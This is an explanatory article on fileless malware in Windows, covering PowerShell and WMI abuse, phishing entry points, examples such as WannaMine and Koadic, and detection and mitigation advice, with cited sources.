Fileless Malware: The Tradeoff of Synergy and Security

 By Ryan Mason

Microsoft Windows is a powerful and long-standing operating system with deep-rooted features that work throughout the system. Windows’ .NET, PowerShell, and Windows Management Instrumentation (WMI) frameworks provide cohesiveness and control, enabling the creation of new features and integration across the system. However, as these systems advance in capabilities and features, malicious actors have more opportunities to break into them. Fileless malware is an increasingly common attack method that cyber groups use to break into and persist in systems without a trace. In contrast to traditional malware, which installs itself on the hard drive as a file, fileless malware abuses the .NET and WMI frameworks to inject code and scripts directly into a system's memory without creating any files or interacting with the hard drive. This offers attackers several advantages: evading detection from signature-based antimalware programs, persistence within the system, and increased difficulty to remove the malicious code.[1]

Fileless malware capitalizes on trusted and otherwise legitimate computer programs to exploit vulnerabilities and gain access to a system's memory, enabling it to propagate and achieve its objectives. It is often used in crypto mining and click fraud attacks.[2] Its use has increased in recent years due to the increase in trusted applications, on which this malware preys. This article explores the functionality of fileless malware, the associated threats it poses, and strategies for mitigating this cyber threat.

Like all malware, fileless malware requires an initial point of entry into a system. Attackers often leverage phishing campaigns to lure victims into clicking on malicious links. Once clicked, the malicious code embeds itself within the memory of existing applications, such as web browsers, PDF viewers, or Microsoft Office, all without the need to download any files or interact with local file systems. On Windows systems, attackers may exploit two potent .NET programs: PowerShell and Windows Management Instrumentation (WMI).[3] Computers commonly fall victim to fileless malware through two primary avenues: phishing emails and malicious links.

The first method involves the propagation of malicious scripts within Excel or Word files, which are typically distributed through phishing emails to employees of large companies. These employees often document exchanges throughout the week, so they are more likely to fall prey to a malicious file without taking the proper precautions. Excel and Word files feature a background coding interface that facilitates data analytics and advanced functionalities, but this also creates an entry point for malicious actors to develop scripts that directly interact with the computer.

The second vector to infect machines occurs through malicious links, which can be embedded in phishing emails that pose as communications from legitimate sources such as a bank or an employee’s own company. When the recipient clicks on the link, the site merely needs to load to trigger a background malicious script, which embeds itself into the device.[4] Once infected, there are two broad attack vectors that the malware may take. The first is memory code injection, which inserts its code into the memory of otherwise benign applications. These often exploit vulnerabilities within programs like Adobe Flash or Java, as well as web browsers. These operations occur within the framework of the host program rather than through a separate application created by the attacker. This method involves Windows registry manipulation. It capitalizes on trusted Windows programs such as PowerShell or WMI to carry out commands. This approach can be substantially more devastating, given its increased difficulty in detection and remediation.[5]

Kaspersky researchers Santiago Pontiroli and Roberto Martinez aptly dubbed PowerShell access as "the Holy Grail for attackers".[6] PowerShell serves as a command-line tool that facilitates code execution, program execution, downloading, and deletion, all while maintaining the ability to load dynamically into memory without ever interacting with the hard drive.[7] Given that most of Microsoft's services natively interact with PowerShell, it often finds itself whitelisted in various scenarios. This affords it extensive access to data throughout the system. Normally, this level of synergy within a system is beneficial for computer speed, but when used maliciously this unfettered access can result in severe consequences. An ordinary user with control over their computer can execute programs, manipulate data, delete files, and navigate the file system, all through scripting via PowerShell input. Fileless malware leverages the same capabilities but with devastating effects.

Windows Management Instrumentation (WMI) is a low-level framework designed to facilitate communication between different software and systems. Due to its significant influence on system functions and minimal forensic footprint, it is notorious for its versatility in cyberattacks. Attackers can employ WMI for various purposes, including reconnaissance, virtual machine detection, code execution, lateral movement, and maintaining persistence.[8] WMI can be harnessed to establish a persistent, asynchronous backdoor. To enhance the control over WMI, this framework can be manipulated remotely through the Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM). Attacks on this service are appealing due to the broad range of computers running it (every computer running Windows 98 and later). Running scripts are adeptly disguised to mimic system commands, and there is generally limited awareness of the vulnerabilities within the WMI service.[9]

            While the scope of fileless malware is extensive, it is limited in that it cannot install any files to the hard drive. WannaMine is an example of this. As the name implies, this is a cryptojacking worm that infects similarly to WannaCry, and exploits the EternalBlue vulnerability in older Windows devices to gain access. It then utilizes the Mimikatz toolset to exploit legitimate credentials. Neither EternalBlue nor Mimikatz touch the hard drive, and any execution of commands is done on the command line, giving it its fileless abilities. This makes detection of intrusion extremely difficult. However, it cannot perform crypto mining without installing software to do so. It can use script commands to install mining software onto the device, which gives anti-malware programs the chance to detect unusual activity on the device.[10]

Where fileless malware excels is in creating a path for more capable malware to ingress into systems. Koadic is a remote access trojan (RAT) that can enable remote desktop access and code execution,[11] file transfer, Mimikatz for credential access, port scanning, and system information collection. More notably, Dyre, which evolved into the infamous TrickBot cyber gang, used fileless techniques to steal banking information from banking firms. It used living-off-the-land techniques like PowerShell scripting and legitimate programs like Windows Registry to evade detection.

To discover a fileless malware attack, nontraditional steps must be taken. Rather than indicators of compromise, victims should look for indicators of attack. Once in a system, an attacker will look for ways to escalate their privileges. They will do this through remote code execution, modifying Windows tools, and creating malicious scripts. It is important to understand and be on the lookout for suspicious activity within trusted applications.[12] New tools have been developed to detect these types of intrusions. Tools like Microsoft Defender have incorporated endpoint analysis to determine if malicious activities are taking place withinin otherwise benevolent applications.[13]

While mitigation of an attack is significantly harder than traditional malware, the steps to protect against fileless malware remain the same. It remains imperative that companies stay vigilant in their IT practices and train their employees to do the same. Continue practices that minimize a network’s attack surface, enforce least-privilege access, and promptly incorporate any security patches to software on a network. The WannaMine virus exploits a 6-year-old vulnerability in Windows devices, and it is not the only malware to do so. Cyber firm BitSight conducted a study and found that companies that ran out-of-date browser software were twice as likely to experience a cyber-attack than companies with less than half of their computers running outdated software.[14]

Fileless malware poses a serious and growing threat in the cybersecurity landscape. As computers’ features and resources for said features expand, so too does the attack surface that attackers can use. Mitigating this threat requires regular system monitoring, network traffic analysis, strict firewall policies, employee security training, and proactive patch management. While traditional signature-based antivirus software cannot detect fileless malware, advanced endpoint detection tools show promise through their use of machine learning. As with any cyber threat, remaining vigilant and promptly addressing vulnerabilities are an organization’s best defense against fileless malware.

[1] Walker, Aaron. “What Is Fileless Malware and How Do Attacks Occur? - G2.” G2, October 7, 2019. https://www.g2.com/articles/what-is-fileless-malware-and-how-attacks-occur.

[2] Elise. “How to Remove Fileless Malware.” Emsisoft, November 18, 2022. https://www.emsisoft.com/en/blog/32034/how-to-remove-fileless-malware/.

[3] Sudhakar, and Sushil Kumar. “An Emerging Threat Fileless Malware: A Survey and Research Challenges - Cybersecurity.” SpringerOpen, January 14, 2020. https://cybersecurity.springeropen.com/articles/10.1186/s42400-019-0043-x.

[4] Walker, Aaron. “What is Fileless Malware”

[5] “What Is Fileless Malware? Examples, Detection and Prevention.” Fortinet. Accessed November 13, 2023. https://fortinet.com/resources/cyberglossary/fileless-malware.

[6] Pontiroli, Santiago M, and F Roberto Martinez. “The TAO of .NET and POWERSHELL Malware.” Kaspersky, 2018. https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07202147/Pontiroli_Martinez-VB2015-2.pdf.

[7] Pontiroli et al. “The TAO of .NET”

[8] Sudhakar et al. “An Emerging Threat”

[9] Graeber, Matt. “Abusing Windows Management Instrumentation (WMI) to Build a Persistent ...” Black Hat, 2015. https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf?%3F%3F%3F%3F%3Futm_source=content.

[10] “Investigate WannaMine - Cryptojacking Worm.” Sophos, December 24, 2021. https://support.sophos.com/support/s/article/KB-000037977?language=en_US.

[11] “Post Exploitation with Koadic.” BRANDEFENSE, November 22, 2022. https://brandefense.io/blog/post-exploitation-with-koadic/.

[12] Pontiroli et al. “The TAO of .NET”

[13] Diogenes, Yuri. “Investigating a Fileless Attack Using Microsoft Defender for Cloud.” Microsoft, October 28, 2021. https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/investigating-a-fileless-attack-using-microsoft-defender-for/ba-p/482994.

[14] Roberts, Paul. “Behind Breaches: Lots of Outdated Software.” Digital Guardian, July 26, 2017. https://www.digitalguardian.com/blog/behind-breaches-lots-outdated-software.